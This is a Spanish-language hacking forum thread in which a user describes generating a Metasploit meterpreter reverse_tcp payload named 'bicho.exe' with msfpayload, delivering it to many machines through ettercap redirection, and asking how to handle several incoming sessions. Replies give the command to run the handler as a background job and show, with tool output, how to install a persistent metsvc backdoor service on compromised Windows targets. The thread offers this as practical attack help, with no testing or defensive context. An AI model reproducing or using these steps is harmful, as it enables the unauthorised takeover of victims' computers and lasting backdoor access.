[SOLUCIONADO] Duda en session meterpreter y handler

Iniciado por tupac123, Noviembre 06, 2013, 07:36:49 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Noviembre 06, 2013, 07:36:49 PM Ultima modificación: Agosto 20, 2014, 08:56:55 PM por Expermicid
Hola , tengo una duda, seré directo con metasploit genere un payload que se llama bicho.exe  y con ettercap hago que todo se redirecionen y pues tenga el control ,y funciona lo malo es  que como son muchas maquinas al momento de dejar el handler en escucha solo hace 1 session y se quede en meterpreter y como todo sucede al mismo tiempo se pierden las otras conexiones que están en camino.

este es el código para generar el payload:

sudo msfpayload windows/meterpreter/reverse_tcp lhost=192.0.4.54  lport=4444 X > /home/Desktop/bicho.exe



se que en el código  esta el truco, quisiera que me ayuden en como puedo hacer que cuando la computadora vulnerada haga click en bicho.exe se redirecione a 192.0.4.54 y si esta, esta con una session meterpreter (osea ocupada ) esta vuelva a redirecionarse en unos 15 segundos.

esa es mi duda y gracias por leerlo espero me respondan  Underc0de ! salud2

en el handler ponle la opcion -j ,despues de configurarlo
Código: text
exploit -j 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[email protected]

Noviembre 07, 2013, 07:26:32 PM #2 Ultima modificación: Noviembre 08, 2013, 01:54:38 AM por CloudswX
Puedes usar "metsvc". Permite definir un proceso persistente en la maquina objetivo que se encontrará a la espera de una nueva conexión por parte del atacante, para esto será necesario en primer lugar "migrar" el proceso de la sesión meterpreter actual a otro proceso "persistente" del objetivo, del modo en el que se ha indicando anteriormente con el comando migrate, por este motivo los procesos que resultan mas interesantes son aquellos propios del sistema operativo, posteriormente se puede ejecutar:

Código: text
meterpreter > run metsvc

[*] Creating a meterpreter service on port 31337

[*] Creating a temporary installation directory C:\DOCUME~1\Owner\LOCALS~1\Temp\lZBdswMe...

[*] >> Uploading metsrv.dll...

[*] >> Uploading metsvc-server.exe...

[*] >> Uploading metsvc.exe...

[*] Starting the service...

* Installing service metsvc

* Starting service

Service metsvc successfully installed.


Como se puede apreciar la backdoor se ha instalado correctamente en el objetivo, ahora es posible realizar una conexión activa (ya no es necesario esperar de forma pasiva a que un usuario ejecute el fichero .exe que habilitará la sesión meterpreter).

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Haz uso de un multi handler para que tus sesiones se conecten  y ya ! .

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!